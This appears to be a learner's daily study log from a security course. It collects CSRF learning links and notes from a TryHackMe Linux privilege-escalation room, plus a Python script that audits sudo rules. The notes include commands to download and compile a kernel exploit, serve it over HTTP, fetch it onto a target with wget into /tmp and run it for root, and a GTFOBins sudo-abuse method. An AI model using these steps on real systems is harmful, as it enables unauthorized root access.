🎯 Day 9 Task
✅ CSRF Video
https://www.youtube.com/watch?v=iyE9UsBF64w
✅ POC
https://www.youtube.com/watch?v=TGJ4I-F5LhE
https://www.youtube.com/watch?v=YPnejsLPfVk
https://www.youtube.com/watch?v=gBdiKqNPQS8
https://www.youtube.com/watch?v=5jHIUTEdpvI
✅ CSRF Writeup
https://huntr.dev/bounties/f952af13-8042-457d-b8d8-bd338987dc02/
✅ Tweet
https://twitter.com/rootxyash/status/1480126074994368512
https://twitter.com/mavericknerd/status/1214071332083658757
🔁 THM Room
➡ Working on Linux PrivEsc Room
✅ Completed till Task 6 Privilege Escalation Sudo
https://tryhackme.com/room/linprivesc
For more info, check out my GitHub repo
https://github.com/Imran407704/Learn365/
Some Tips :
The Kernel exploit methodology is simple :
- Identify the kernel version
- Search and find an exploit code for the kernel version of the target system
- Run the exploit
Remember that: a failed kernel exploit can lead to a system crash :P
The Sudo exploit methodology :
- First check which programs a normal user can run with sudo rights: sudo -l
- Go to https://gtfobins.github.io and search for the binary that has sudo rights
- Paste that command and you are the root user :)
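The same sudo -l listing can be reviewed from the admin side to find rules worth tightening. The script below is an added example, not part of the original post: SHELL_CAPABLE is a small illustrative subset of GTFOBins, and the sample listing, user alice and host web01 are constructed.

```python
import os
import re

# Illustrative subset of binaries GTFOBins lists under "Sudo" (assumption: not the full catalogue).
SHELL_CAPABLE = {"awk", "env", "find", "less", "nano", "nmap", "perl", "python3", "tar", "vim"}

# One rule line of `sudo -l`: "(runas) [TAG: ...] cmd[, cmd ...]"
ENTRY = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$")

# Constructed sample output; user "alice" and host "web01" are made up.
SAMPLE = """\
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/find
    (root) NOPASSWD: /usr/bin/less /var/log/syslog, /usr/bin/uptime
    (root) /usr/bin/chown alice /srv/app/*
    (ALL : ALL) ALL
"""


def audit_sudo_listing(text):
    """Return (runas, command, nopasswd, reason) for each rule worth tightening."""
    findings, in_rules = [], False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_rules = True
            continue
        match = ENTRY.match(line) if in_rules else None
        if not match:
            continue
        nopasswd = "NOPASSWD:" in match.group("tags")
        for cmd in filter(None, (c.strip() for c in match.group("cmds").split(","))):
            binary = os.path.basename(cmd.split()[0])
            if cmd == "ALL":
                reason = "unrestricted: any command"
            elif binary in SHELL_CAPABLE:
                reason = "binary can spawn a shell or touch files as the target user"
            elif "*" in cmd:
                reason = "wildcard widens the rule beyond one fixed command"
            else:
                continue  # fixed command with no known escape in our subset
            findings.append((match.group("runas"), cmd, nopasswd, reason))
    return findings


if __name__ == "__main__":
    for runas, cmd, nopasswd, reason in audit_sudo_listing(SAMPLE):
        print(f"[{'NOPASSWD' if nopasswd else 'password'}] ({runas}) {cmd}: {reason}")
```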
Some Keywords :
String | Meaning |
---|---|
Local system | My Computer |
EXPL_FILE | Name of that Particular Exploit (in my case the name of exploit is 37292) |
IP:PORT | VPN IP (if you are on TryHackMe) / local system IP : the port on which the HTTP server was started |
- (hyphen) | The command comes after the hyphen :) |
My Steps for Kernel Exploit :
- Downloaded the exploit to the local system - wget https://www.exploit-db.com/exploits/EXPL_FILE
- Compiled it with gcc - gcc 37292.c -o exploit
- Started an HTTP server on the local system - sudo python3 -m http.server
- Then go to the tmp (temp) directory on the target machine, because this is the directory where we have write permission. I also checked the home directory, but I was not able to transfer the exploit from the local machine there - wget http://IP:PORT/exploit (remember to use http, not https)
- ./exploit ROOT User :)
My Steps for Sudo Exploit :
- First check which programs a normal user can run with sudo rights - sudo -l
- Go to https://gtfobins.github.io and search for the binary that has sudo rights
#bugbounty #privesc #infosec #learn365